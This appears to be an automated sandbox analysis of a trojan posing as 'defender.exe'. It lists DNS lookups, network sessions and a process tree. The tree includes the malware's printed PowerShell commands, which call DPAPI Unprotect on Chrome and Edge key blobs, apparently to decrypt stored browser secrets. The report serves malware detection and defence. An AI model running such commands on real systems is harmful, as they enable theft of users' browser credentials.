Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | 54.220.102.164 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | 52.17.118.218 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | 54.171.33.24 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:14.065613985 CEST | 1.1.1.1 | 192.168.2.7 | 0xaefb | No error (0) | socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com | | 63.33.78.190 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:16.067498922 CEST | 1.1.1.1 | 192.168.2.7 | 0xe8ae | No error (0) | sockjs-eu.pusher.com | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2024 16:24:16.067498922 CEST | 1.1.1.1 | 192.168.2.7 | 0xe8ae | No error (0) | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | 52.48.38.99 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:16.067498922 CEST | 1.1.1.1 | 192.168.2.7 | 0xe8ae | No error (0) | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | 54.216.83.132 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:16.067498922 CEST | 1.1.1.1 | 192.168.2.7 | 0xe8ae | No error (0) | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | 99.81.234.0 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.287096024 CEST | 1.1.1.1 | 192.168.2.7 | 0x56c2 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.287096024 CEST | 1.1.1.1 | 192.168.2.7 | 0x56c2 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.287175894 CEST | 1.1.1.1 | 192.168.2.7 | 0x6b | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Aug 4, 2024 16:24:21.350507975 CEST | 1.1.1.1 | 192.168.2.7 | 0x736c | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.350507975 CEST | 1.1.1.1 | 192.168.2.7 | 0x736c | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:21.350742102 CEST | 1.1.1.1 | 192.168.2.7 | 0x7141 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Aug 4, 2024 16:24:31.071904898 CEST | 1.1.1.1 | 192.168.2.7 | 0x1fc | No error (0) | sockjs-eu.pusher.com | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2024 16:24:31.071904898 CEST | 1.1.1.1 | 192.168.2.7 | 0x1fc | No error (0) | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | 99.81.234.0 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:31.071904898 CEST | 1.1.1.1 | 192.168.2.7 | 0x1fc | No error (0) | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | 52.48.38.99 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:24:31.071904898 CEST | 1.1.1.1 | 192.168.2.7 | 0x1fc | No error (0) | ingress-sticky-haproxy-eu-da5b7868dc470a9a.elb.eu-west-1.amazonaws.com | | 54.216.83.132 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:25:14.073774099 CEST | 1.1.1.1 | 192.168.2.7 | 0x7edd | No error (0) | stats.pusher.com | clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 4, 2024 16:25:14.073774099 CEST | 1.1.1.1 | 192.168.2.7 | 0x7edd | No error (0) | clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com | | 3.222.214.216 | A (IP address) | IN (0x0001) | false
Aug 4, 2024 16:25:14.073774099 CEST | 1.1.1.1 | 192.168.2.7 | 0x7edd | No error (0) | clientstats1-dummy-server-lb-398743415.us-east-1.elb.amazonaws.com | | 54.92.189.105 | A (IP address) | IN (0x0001) | false
                                                                    • chrome.cloudflare-dns.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49722 | 162.159.61.3 | 443 | 5484 | C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-04 14:24:21 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-08-04 14:24:21 UTC | 128 | OUT | Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: wwwgstaticcom)TP
2024-08-04 14:24:21 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Sun, 04 Aug 2024 14:24:21 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8adf35e89e307c99-EWR
alt-svc: h3=":443"; ma=86400
2024-08-04 14:24:21 UTC | 468 | IN | Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 08 00 04 8e fa 41 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: wwwgstaticcomA)


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.749723172.64.41.34435484C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-08-04 14:24:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                    Host: chrome.cloudflare-dns.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 128
                                                                    Accept: application/dns-message
                                                                    Accept-Language: *
                                                                    User-Agent: Chrome
                                                                    Accept-Encoding: identity
                                                                    Content-Type: application/dns-message
                                                                    2024-08-04 14:24:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: wwwgstaticcom)TP
                                                                    2024-08-04 14:24:21 UTC247INHTTP/1.1 200 OK
                                                                    Server: cloudflare
                                                                    Date: Sun, 04 Aug 2024 14:24:21 GMT
                                                                    Content-Type: application/dns-message
                                                                    Connection: close
                                                                    Access-Control-Allow-Origin: *
                                                                    Content-Length: 468
                                                                    CF-RAY: 8adf35e918355e70-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-08-04 14:24:21 UTC | 468 | IN | Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e3 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Data Ascii: wwwgstaticcom c)


                                                                    Target ID:0
                                                                    Start time:10:23:20
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe"
                                                                    Imagebase:0x400000
                                                                    File size:69'484'987 bytes
                                                                    MD5 hash:A4590450863F13AA67198EC0FE52453E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:12
                                                                    Start time:11:34:53
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:11:34:57
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:11:34:57
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:11:34:57
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist
                                                                    Imagebase:0x7ff708e80000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:21
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:tasklist
                                                                    Imagebase:0x7ff708e80000
                                                                    File size:106'496 bytes
                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:23
                                                                    Start time:11:34:58
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')
                                                                    Imagebase:0x7ff741d30000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:11:35:05
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"
                                                                    Imagebase:0x7ff6a2d50000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:25
                                                                    Start time:11:35:05
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff604cd0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:11:35:05
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')
                                                                    Imagebase:0x7ff741d30000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:11:35:17
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:29
                                                                    Start time:11:35:17
                                                                    Start date:04/08/2024
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff70ffd0000
                                                                    File size:5'141'208 bytes
                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:30
                                                                    Start time:11:35:19
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:31
                                                                    Start time:11:35:20
                                                                    Start date:04/08/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
                                                                    Imagebase:0x7ff7ed8a0000
                                                                    File size:162'041'856 bytes
                                                                    MD5 hash:050F6E0968C055E912AB6CA8DC12A881
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false


                                                                      Execution Graph

                                                                      Execution Coverage:2.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:100%
                                                                      Total number of Nodes:7
                                                                      Total number of Limit Nodes:0
                                                                      [Execution graph rendered as an image in the original report; both traced paths end in a CryptUnprotectData call]

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1652323334.00007FFAAB7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab7d0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID: 6`$0Wj
                                                                      • API String ID: 834300711-3614157630
                                                                      • Opcode ID: 2703d216786699126ca12185e824e6f78f26b489a15ddce77a456afff9eb7ce7
                                                                      • Instruction ID: 99939db400369a95a6272818ab5ba1088675207bfbd9dd8475830101702ae259
                                                                      • Opcode Fuzzy Hash: 2703d216786699126ca12185e824e6f78f26b489a15ddce77a456afff9eb7ce7
                                                                      • Instruction Fuzzy Hash: E7511971A1DA4C9FD758EB2CD805AB97BE4EF5A350F0441BFE04DC3292CE64A8058BC2

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      [Control-flow graph rendered as an image in the original report; the traced block calls CryptUnprotectData]
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1652323334.00007FFAAB7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab7d0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID: CryptDataUnprotect
                                                                      • String ID:
                                                                      • API String ID: 834300711-0
                                                                      • Opcode ID: 61d3f7c1e65e0e1b1f36b5aa86fe36d359ba474bb035f52a9138ebe160e61928
                                                                      • Instruction ID: f7f86b0ac44aacfba15b80d50e2444b4dd61a44220d2342e683fb8f4e4703904
                                                                      • Opcode Fuzzy Hash: 61d3f7c1e65e0e1b1f36b5aa86fe36d359ba474bb035f52a9138ebe160e61928
                                                                      • Instruction Fuzzy Hash: B031C33191CA489FDB18DF5CD806AB9BBE0FB59311F00822FE449D3652DB74A8568BC2

                                                                      Execution Graph

                                                                      Execution Coverage:6.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
